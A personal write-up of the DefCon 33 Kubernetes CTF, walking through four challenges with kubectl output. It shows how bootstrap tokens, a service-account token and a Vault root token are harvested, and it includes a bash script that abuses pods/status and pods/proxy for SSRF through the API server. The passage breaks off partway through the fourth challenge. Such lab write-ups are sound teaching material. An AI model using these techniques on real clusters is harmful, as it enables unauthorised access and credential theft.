DefCon 33 Kubernetes CTF Writeup
Table of Contents
Introduction
I had the pleasure of taking part in the Kubernetes CTF at DefCon again. This is a CTF led by Jay Beale from InGuardians. They usually have some fun theming and concepts. I particularly remember the Scott Pilgrim CTF from a year or two ago. One thing I did note for this years is that there are more authors of challenges now, so hopefully an even bigger variety.
Challenge 1 - diomhaireachdan by Raesene (Rory McCune)
This challenges description was:
Can you find my secret?
You will not need to start or enter any pods/containers in the cluster.
Sounds like we need to find a secret. Let’s get started with a trusty auth can-i --list
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
secrets [] [] [list]
Nice, we can list secrets. Let’s see what we have.
$ k get secrets
NAME TYPE DATA AGE
bootstrap-token-4g1ozq bootstrap.kubernetes.io/token 5 9s
bootstrap-token-710mks bootstrap.kubernetes.io/token 5 9s
bootstrap-token-74j090 bootstrap.kubernetes.io/token 5 9s
bootstrap-token-ay2z85 bootstrap.kubernetes.io/token 7 39s
bootstrap-token-dugrj2 bootstrap.kubernetes.io/token 5 9s
bootstrap-token-i7aolq bootstrap.kubernetes.io/token 5 9s
bootstrap-token-omvv5g bootstrap.kubernetes.io/token 6 49s
bootstrap-token-u25be1 bootstrap.kubernetes.io/token 5 9s
Oh, that’s quite a few bootstrap tokens…
$ k get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
auth-extra-groups: c3lzdGVtOmJvb3RzdHJhcHBlcnM6Y2xvdWRzZWM=
token-id: NGcxb3px
token-secret: d2lqeWk4YXNvY3QwdnJjMg==
usage-bootstrap-authentication: dHJ1ZQ==
usage-bootstrap-signing: dHJ1ZQ==
kind: Secret
metadata:
creationTimestamp: "2025-08-10T00:05:50Z"
name: bootstrap-token-4g1ozq
namespace: kube-system
resourceVersion: "780"
uid: 2bc8c152-a769-48a2-97c2-0b9bf7945060
type: bootstrap.kubernetes.io/token
- apiVersion: v1
data:
auth-extra-groups: c3lzdGVtOmJvb3RzdHJhcHBlcnM6ZGVmY29uLWhhY2tlcnM=
token-id: NzEwbWtz
token-secret: emdudmZ5c2ZkYWJvdGdkdA==
usage-bootstrap-authentication: dHJ1ZQ==
usage-bootstrap-signing: dHJ1ZQ==
kind: Secret
metadata:
creationTimestamp: "2025-08-10T00:05:50Z"
name: bootstrap-token-710mks
namespace: kube-system
resourceVersion: "776"
uid: e8e6e414-2cd6-4fc0-abe4-3e141c7cc3d8
type: bootstrap.kubernetes.io/token
[..SNIP..]
They look a bit different too… let’s extract the tokens for each of these, and then we can enumerate their permissions each.
$ k get secrets -o json | jq '.items[].data | (."token-id" | @base64d) + "." + (."token-secret" | @base64d)' -r
4g1ozq.wijyi8asoct0vrc2
710mks.zgnvfysfdabotgdt
74j090.ihfqwo0krekgpi1b
ay2z85.ccvy7tk2y3qvxban
dugrj2.bxw8qnbjytp5eqgk
i7aolq.iemcxa1wqegv42vv
omvv5g.pz5fuvthz8ard377
u25be1.2gafybtxpqe7gci7
With those saved as /tmp/token
, we can now enumerate each of those.
$ cat /tmp/tokens | while read token; do echo $token; k --token $token auth can-i --list; done
4g1ozq.wijyi8asoct0vrc2
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
710mks.zgnvfysfdabotgdt
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
74j090.ihfqwo0krekgpi1b
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
ay2z85.ccvy7tk2y3qvxban
Resources Non-Resource URLs Resource Names Verbs
certificatesigningrequests.certificates.k8s.io [] [] [create get list watch]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
certificatesigningrequests.certificates.k8s.io/nodeclient [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
configmaps [] [kube-proxy] [get]
configmaps [] [kubeadm-config] [get]
configmaps [] [kubelet-config] [get]
nodes [] [] [get]
dugrj2.bxw8qnbjytp5eqgk
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
i7aolq.iemcxa1wqegv42vv
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
configmaps [] [] [list]
namespaces [] [] [list]
omvv5g.pz5fuvthz8ard377
Resources Non-Resource URLs Resource Names Verbs
certificatesigningrequests.certificates.k8s.io [] [] [create get list watch]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
certificatesigningrequests.certificates.k8s.io/nodeclient [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
configmaps [] [kube-proxy] [get]
configmaps [] [kubeadm-config] [get]
configmaps [] [kubelet-config] [get]
nodes [] [] [get]
u25be1.2gafybtxpqe7gci7
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Skimming the list, token i7aolq.iemcxa1wqegv42vv
has slightly different permissions than normal. It has configmap and namespace access. Let’s see what it has, typically bootstrap tokens have cluster-wide access - hence the -A
here.
$ k --token i7aolq.iemcxa1wqegv42vv get -A cm
NAMESPACE NAME DATA AGE
data extra-access 1 5m56s
data kube-root-ca.crt 1 5m56s
default kube-root-ca.crt 1 6m1s
default script-runner 1 5m56s
kube-node-lease kube-root-ca.crt 1 6m1s
kube-public cluster-info 9 6m6s
kube-public kube-root-ca.crt 1 6m1s
kube-system calico-config 4 5m55s
kube-system coredns 1 6m5s
kube-system extension-apiserver-authentication 6 6m10s
kube-system kube-apiserver-legacy-service-account-token-tracking 1 6m10s
kube-system kube-proxy 2 6m5s
kube-system kube-root-ca.crt 1 6m1s
kube-system kubeadm-config 1 6m6s
kube-system kubelet-config 1 6m6s
That extra-access
in data looks interesting, unfortunately we can’t get
that specifically, but we have list so we can retrieve all from the namespace.
$ k --token i7aolq.iemcxa1wqegv42vv -n data get cm -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: '{flag-raesenes-ramblings}'
kind: ConfigMap
metadata:
creationTimestamp: "2025-08-10T00:05:20Z"
name: extra-access
namespace: data
resourceVersion: "391"
uid: fe9a8810-ec5c-4bbc-9e38-68a50bf73291
- apiVersion: v1
data:
ca.crt: |
-----BEGIN CERTIFICATE-----
MIIC6jCCAdKgAwIBAgIBADANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwprdWJl
cm5ldGVzMB4XDTI1MDgwOTIzNTk1MFoXDTM1MDgwODAwMDQ1MFowFTETMBEGA1UE
AxMKa3ViZXJuZXRlczCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANTg
sypCsC6ODsKXpe1IB/SQn9NSFlj0UW+bp6h/t4A9qHZi13TPJgz1D1RZgD72tAnq
vDNb1TTtKOgOwVJl+TxUIueMok8Pin4cK+o5JC4Ud854iA2392wjUQydwM8hpMIy
kSkIr/pbsgO/DWKeiqt7RF5LKhWziHKZmfc5Xe59KamFtJbvtolz3Pf2Q1qWxgEx
ZvOQ4unKdFyq/Cr0Kr3CfaFUhKgIvk+BAFzfZwoEOf90QwVRHPA9FWXUylygLxh0
ZqqaBMWPk7q8eGKbIIetdiPRbWbFjm0fk8J0eulAu/ikXcfyPUxvL4jMMsflkOe1
p2YykOGnCcF6UaPX5rECAwEAAaNFMEMwDgYDVR0PAQH/BAQDAgKkMBIGA1UdEwEB
/wQIMAYBAf8CAQAwHQYDVR0OBBYEFMX6eycMn9yNfZTM8dYAIiNYd3YcMA0GCSqG
SIb3DQEBCwUAA4IBAQBOKDIgromziDL0CShyrpy62DSX3UH6/F6MNG+bm8tRRCFg
nFW/zKeFJ3Mnn5xd9Ed4+5z5c/AzdNR2XW69VSjJYZCdNNR9MYP0nhM8oEIktQLL
PCIZHh27+sQqS/nFtldH1e+nC1Wl6m5RHyKcni6nVfvjtgMNjKWyExNH/VRi/4z8
ojT8FeaU+fJVFj9+JtFBL5ug2SK0I5353LYyXWYhGiYdRwZ2wkvs9YMX18F5rSTK
vdYfvNwgIsHPUFuUHi8U8a9YkJPSKKLcoURm4GF/WtgZF0flLEIx4X3fqs2wpYET
KqzkHD8GSLrmexzgD0cAoGzHgZxYgojbkLmXv72l
-----END CERTIFICATE-----
kind: ConfigMap
metadata:
annotations:
kubernetes.io/description: Contains a CA bundle that can be used to verify the
kube-apiserver when using internal endpoints such as the internal service
IP or kubernetes.default.svc. No other usage is guaranteed across distributions
of Kubernetes clusters.
creationTimestamp: "2025-08-10T00:05:20Z"
name: kube-root-ca.crt
namespace: data
resourceVersion: "390"
uid: 4c826624-3597-48fa-9fe9-5ed555f1512a
kind: List
metadata:
resourceVersion: ""
Nice, that’s flag 1.
Challenge 2 - looking-under-rock by Rob CurtinSeufert
This challenge has the description.
Is there a better place to store secrets, then under a rock?
Once again, let’s start with permissions.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
namespaces [] [] [list get]
pods [] [] [list get]
Nice, we can see namespaces. Let’s see what is there.
$ k get ns
NAME STATUS AGE
default Active 113s
kube-node-lease Active 113s
kube-public Active 113s
kube-system Active 113s
vault Active 100s
velero Active 100s
OK, so vault is a password manager - that’s probably where the flag is based of the description. Velero is for backups. Let’s start digging into these.
$ k get -A pods
NAMESPACE NAME READY STATUS RESTARTS AGE
default script-runner 0/1 Completed 0 107s
kube-system calico-kube-controllers-576865d959-7ng9w 1/1 Running 0 107s
kube-system calico-node-45bgx 1/1 Running 0 107s
kube-system calico-node-hvmvh 1/1 Running 0 103s
kube-system coredns-668d6bf9bc-jwqf6 1/1 Running 0 113s
kube-system coredns-668d6bf9bc-xqvlz 1/1 Running 0 113s
kube-system etcd-ctfd-35-8wrvq-5m5f4 1/1 Running 0 116s
kube-system kube-apiserver-ctfd-35-8wrvq-5m5f4 1/1 Running 0 119s
kube-system kube-controller-manager-ctfd-35-8wrvq-5m5f4 1/1 Running 0 116s
kube-system kube-proxy-24jww 1/1 Running 0 103s
kube-system kube-proxy-48z6l 1/1 Running 0 113s
kube-system kube-scheduler-ctfd-35-8wrvq-5m5f4 1/1 Running 0 117s
vault vault 1/1 Running 0 107s
velero backup 1/1 Running 0 107s
Checking the vault
pod doesn’t return much. However, velero
does seem to have some fun stuff within.
$ k -n velero get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
annotations:
backup: eyJhbGciOiJSUzI1NiI[..SNIP..]
cni.projectcalico.org/containerID: 69d67ae6fc86282948dbb91f41dbc47a282b859e0813541d2d47a327a3e715ed
cni.projectcalico.org/podIP: 192.168.183.194/32
cni.projectcalico.org/podIPs: 192.168.183.194/32
creationTimestamp: "2025-08-10T00:13:42Z"
name: backup
namespace: velero
resourceVersion: "786"
uid: cce06bda-7cc6-4cc8-b8fe-13d03511bbaa
[..SNIP..]
Nice, a service account token is within its annotations.
$ export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6Imc3aEpWTURfOHB[..SNIP..]
$ alias k="kubectl --token $TOKEN"
$ k auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:vault:backup
UID e9db1f98-6317-4372-bc3f-e707000e2228
Groups [system:serviceaccounts system:serviceaccounts:vault system:authenticated]
Extra: authentication.kubernetes.io/credential-id [JTI=63aefdf3-1f25-453f-87f0-c0ec730cc1cf]
Nice, so this service account is from the vault
namespace. OK, let’s see what it can do in the vault
namespace.
$ k auth can-i --list -n vault
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
pods/log [] [] [list watch get]
pods [] [] [list watch get]
OK, so this can execute into pods and view logs. From experience running vault, I know that it can output the root authentication token to its logs. So let’s check that first.
$ k -n vault logs vault
==> Vault server configuration:
[..SNIP..]
You may need to set the following environment variables:
$ export VAULT_ADDR='http://127.0.0.1:8200'
The unseal key and root token are displayed below in case you want to
seal/unseal the Vault or re-authenticate.
Unseal Key: O20AajFZ+PBGlFUpTenz6cgzIfttOOi0AR8SMEsIoT4=
Root Token: hvs.Pax01SFyuoFuuDu9gGkkSTms
Development mode should NOT be used in production installations!
Woo, root token. Now, let’s exec in and use it to see whats in vault.
$ k -n vault exec -ti vault -- sh
/ # export VAULT_ADDR='http://127.0.0.1:8200'
/ # vault login
Token (will be hidden):
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.
Key Value
--- -----
token hvs.Pax01SFyuoFuuDu9gGkkSTms
token_accessor U4MTDgltXBTgEWPofcAcR6EQ
token_duration ∞
token_renewable false
token_policies ["root"]
identity_policies []
policies ["root"]
That is us logged in. Let’s find that secret.
/ # vault secrets list
Path Type Accessor Description
---- ---- -------- -----------
cubbyhole/ cubbyhole cubbyhole_7b9ed5af per-token private secret storage
identity/ identity identity_16bd7e69 identity store
secret/ kv kv_9d3a8f22 key/value secret storage
sys/ system system_87e48811 system endpoints used for control, policy and debugging
/ # vault kv list secret/
Keys
----
flag
/ # vault kv get secret/flag
== Secret Path ==
secret/data/flag
======= Metadata =======
Key Value
--- -----
created_time 2025-08-10T00:14:38.666913358Z
custom_metadata <nil>
deletion_time n/a
destroyed false
version 1
==== Data ====
Key Value
--- -----
flag {flag-iamaninja-fromthehiddenleaf}
Excellent. That’s the second flag. Onwards.
Challenge 3 - hillwalker by Raesene (Rory McCune)
The description for this challenge was
You will not be exec'ing into any pods. See what rights you have in the `hillwalker` namespace. This IP addess might be important later: 5.78.138.141
It should be noted that the last sentence with the IP address was not there from the start. I’ll get to that later.
Starting where we always do.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods/status [] [] [*]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods/proxy [] [] [get create]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, so we have pods/proxy
and pods/status
. There are some fun things you can do with those permissions. Namely use the API server for effectively SSRF. I won’t go into too much details here, Raesene has a good blog post about it here.
Let’s see what pod we have to take-over.
$ k get pods
NAME READY STATUS RESTARTS AGE
webserver 1/1 Running 0 50s
Let’s also grab the script from his Raesene’s blog post and convert it for our use case. Namely this involves changing the POD, and namespaces within the curl command. The final script looks like:
#!/bin/bash
set -euo pipefail
readonly PORT=8001
readonly POD=webserver
readonly TARGETIP=x.x.x.x
while true; do
curl -v -H 'Content-Type: application/json' \
"http://localhost:${PORT}/api/v1/namespaces/hillwalker/pods/${POD}/status" >"${POD}-orig.json"
cat $POD-orig.json |
sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \
>"${POD}-patched.json"
curl -v -H 'Content-Type:application/merge-patch+json' \
-X PATCH -d "@${POD}-patched.json" \
"http://localhost:${PORT}/api/v1/namespaces/hillwalker/pods/${POD}/status"
rm -f "${POD}-orig.json" "${POD}-patched.json"
done
Next, we set up kubectl proxy
so that the curl
commands can hit the API server on localhost:8001
, and now we can start sending SSRF requests.
The command to do that looks like curl http://127.0.0.1:8001/api/v1/namespaces/hillwalker/pods/http:webserver:80/proxy/
.
At this point, I spend a while trying different IPs, trying to figure out what I’m meant to perform a GET request to. Eventually, talking to the organisers they realised they had missed the IP in the description (hence the IP addition). With the IP obtained, we can query it and get the flag.
$ curl http://127.0.0.1:8001/api/v1/namespaces/hillwalker/pods/http:webserver:80/proxy/
{flag-proxy-ftw-check-out-raesene-amicontained}
Challenge 4 - shell-in-the-ghost by antitree
Onwards.
Exec into the `entry-pod` pod in the `shell-in-the-ghost` namespace to start.
I assume everyone knows what the first command is.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
pods/portforward [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Alright, let’s jump into the entry-pod
. Nothing too special here aside from port forwarding. Which I’m sure we will figure out its use later.
$ k get pods
NAME READY STATUS RESTARTS AGE
entry-pod 1/1 Running 0 38s
$ k exec -it entry-pod -- bash
root@entry-pod:/#
Enumerating the container (including installing various tools such as procps
, iproute2
, and net-tools
)
root@entry-pod:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 11468 7552 ? Ss 00:23 0:00 nginx: master process nginx -g daemon off;
nginx 36 0.0 0.0 11936 3056 ? S 00:23 0:00 nginx: worker process
nginx 37 0.0 0.0 11936 3056 ? S 00:23 0:00 nginx: worker process
nginx 38 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 39 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 40 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 41 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 42 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 43 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 44 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 45 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 46 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 47 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 48 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 49 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 50 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 51 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
root 52 0.0 0.0 4192 3328 pts/0 Ss 00:23 0:00 bash
root 248 0.0 0.0 8104 4224 pts/0 R+ 00:24 0:00 ps aux
OK, looks like there is an Nginx process. Let’s quickly check if it’s serving anything.
root@entry-pod:/etc/nginx/conf.d# cat default.conf
server {
listen 80;
listen [::]:80;
server_name localhost;
#access_log /var/log/nginx/host.access.log main;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
[..SNIP..]
root@entry-pod:/usr/share/nginx/html# ls -alp
total 12636
drwxr-xr-x 1 root root 4096 Jul 22 15:18 ./
drwxr-xr-x 1 root root 4096 Jul 22 01:13 ../
-rw-r--r-- 1 root root 497 Jun 24 17:22 50x.html
-rw-rw-r-- 1 root root 66 Jul 22 15:00 index.html
-rw-rw-r-- 1 root root 12922817 Jul 22 15:00 shell-in-the-ghost.tar.gz
OK, there is a shell-in-the-ghost.tar.gz
file. That is probably relevant. Let’s fetch it over the port-forward.
$ k port-forward pod/entry-pod 8080:80
Forwarding from 127.0.0.1:8080 -> 80
Forwarding from [::1]:8080 -> 80
After downloading the file through the browser, we can extract it.
$ x shell-in-the-ghost.tar.gz
blobs/
blobs/sha256/
blobs/sha256/1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984
blobs/sha256/42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b
blobs/sha256/5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92
blobs/sha256/59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc
blobs/sha256/5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8
blobs/sha256/601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056
blobs/sha256/65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f
blobs/sha256/6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01
blobs/sha256/760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19
blobs/sha256/88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306
blobs/sha256/8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924
blobs/sha256/8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00
blobs/sha256/92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317
blobs/sha256/99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7
blobs/sha256/c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5
blobs/sha256/d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3
blobs/sha256/d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5
blobs/sha256/e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d
blobs/sha256/e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd
blobs/sha256/e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675
blobs/sha256/eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e
blobs/sha256/f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17
index.json
manifest.json
oci-layout
repositories
shell-in-the-ghost.tar.gz: extracted to `shell-in-the-ghost' (multiple files in root)
Oh, this looks to be a docker image. OK, let’s load it into docker as well so we can investigate it a bit.
$ docker load -i shell-in-the-ghost.tar.gz
Loaded image: antitree/shell-in-the-ghost:latest
$ docker history --no-trunc antitree/shell-in-the-ghost:latest
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5 5 weeks ago RUN /bin/sh -c echo "Nothing to see here. Everything's clean." > /README.md # buildkit 41B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY falseflag3.txt /.wh.hidden.txt # buildkit 57B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c rm -rf /tmp/*, /cache/*, /var/cache/apk/*, var/lib/db/sbom/* # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c rm /deep/hide/flag.txt # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY falseflag2.txt /deep/hide/flag.txt # buildkit 61B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c mkdir -p /deep/hide # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY rootfs / # buildkit 15.7MB buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c rm /.wh.flag.txt # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY falseflag1.txt /.wh.flag.txt # buildkit 33B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY rootfs / # buildkit 15.7MB buildkit.dockerfile.v0
Interesting. Multiple fake flags. There is probably a real flag amongst them. I also note they’re deleting files within. So we will want to find the files in intermediary layers.
What I tend to do in these cases is just extract all the layers. We can quickly enumerate all blob tar files within the image and extract them all. find
can then be used to find what we need.
╭─user@blackarch /tmp/shell-in-the-ghost/blobs/sha256
